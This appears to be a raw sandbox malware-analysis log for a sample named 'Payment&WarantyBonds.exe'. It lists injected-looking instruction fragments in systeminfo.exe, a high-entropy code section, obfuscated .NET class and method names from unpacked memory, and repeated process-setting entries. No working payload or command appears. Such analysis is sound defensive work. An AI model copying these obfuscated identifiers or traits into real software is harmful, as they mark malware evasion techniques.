Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047609AD push ecx; mov dword ptr [esp], ecx 7_2_047609B6
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_005710D9 push ss; retf 7_2_0057116B
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0055E25E push edx; retf 7_2_0055E25D
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0055E200 push edx; retf 7_2_0055E25D
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00564568 push esi; ret 7_2_0056456A
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0055E5FE push ss; iretd 7_2_0055E612
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00562607 pushfd ; ret 7_2_00562608
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00560807 pushfd ; ret 7_2_00560808
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00564A1E push esi; ret 7_2_00564A27
Source: Payment&WarantyBonds.exe Static PE information: section name: .text entropy: 7.95788200827039
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, HAAlopX3s3btnJ7UlG.cs High entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, AADQktakk8MTMyie6y.cs High entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, O9OVTvmJ5CwcbAA2QZ.cs High entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, ABxuR4jclTb0QJbmgq0.cs High entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, NrmpeS2PNSGs7X0CKD.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, lEe6OTuveACY3rt9Ok.cs High entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, RujqcAN6TG7qku38oo.cs High entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, Qcbo1atUNRX5uYhT4D.cs High entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, MnUca67wwyq9isAD8V.cs High entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, JFv6NDqobKO3oP7PJ5.cs High entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, uLGJVHvUgM9ulOmn62.cs High entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, uPpMvls1PHjFnvTcDG.cs High entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs High entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, hsiK9PiqZrfnl6rMvi.cs High entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, c3QNNUoubAttVxH9S2.cs High entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, LjvKfjQI7ZTyW35Lpd.cs High entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, CGdMn0bkxNbGSKYFA0.cs High entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, ioi8Rkz6CpkkqYwguL.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, jfce7djWOMMimZwhZQb.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, cILh9bHvx4dPN3VnUI.cs High entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, qtiCGhV5g3bg8x5VxE.cs High entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, HYqHWc4dupAKCWiUdf.cs High entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, HAAlopX3s3btnJ7UlG.cs High entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, AADQktakk8MTMyie6y.cs High entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, O9OVTvmJ5CwcbAA2QZ.cs High entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, ABxuR4jclTb0QJbmgq0.cs High entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, NrmpeS2PNSGs7X0CKD.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, lEe6OTuveACY3rt9Ok.cs High entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, RujqcAN6TG7qku38oo.cs High entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, Qcbo1atUNRX5uYhT4D.cs High entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, MnUca67wwyq9isAD8V.cs High entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, JFv6NDqobKO3oP7PJ5.cs High entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, uLGJVHvUgM9ulOmn62.cs High entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, uPpMvls1PHjFnvTcDG.cs High entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs High entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, hsiK9PiqZrfnl6rMvi.cs High entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, c3QNNUoubAttVxH9S2.cs High entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, LjvKfjQI7ZTyW35Lpd.cs High entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, CGdMn0bkxNbGSKYFA0.cs High entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, ioi8Rkz6CpkkqYwguL.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, jfce7djWOMMimZwhZQb.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, cILh9bHvx4dPN3VnUI.cs High entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, qtiCGhV5g3bg8x5VxE.cs High entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, HYqHWc4dupAKCWiUdf.cs High entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, HAAlopX3s3btnJ7UlG.cs High entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, AADQktakk8MTMyie6y.cs High entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, O9OVTvmJ5CwcbAA2QZ.cs High entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, ABxuR4jclTb0QJbmgq0.cs High entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, NrmpeS2PNSGs7X0CKD.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, lEe6OTuveACY3rt9Ok.cs High entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, RujqcAN6TG7qku38oo.cs High entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, Qcbo1atUNRX5uYhT4D.cs High entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, MnUca67wwyq9isAD8V.cs High entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, JFv6NDqobKO3oP7PJ5.cs High entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, uLGJVHvUgM9ulOmn62.cs High entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, uPpMvls1PHjFnvTcDG.cs High entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.cs High entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, hsiK9PiqZrfnl6rMvi.cs High entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, c3QNNUoubAttVxH9S2.cs High entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, LjvKfjQI7ZTyW35Lpd.cs High entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, CGdMn0bkxNbGSKYFA0.cs High entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, ioi8Rkz6CpkkqYwguL.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, jfce7djWOMMimZwhZQb.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, cILh9bHvx4dPN3VnUI.cs High entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, qtiCGhV5g3bg8x5VxE.cs High entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, HYqHWc4dupAKCWiUdf.cs High entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
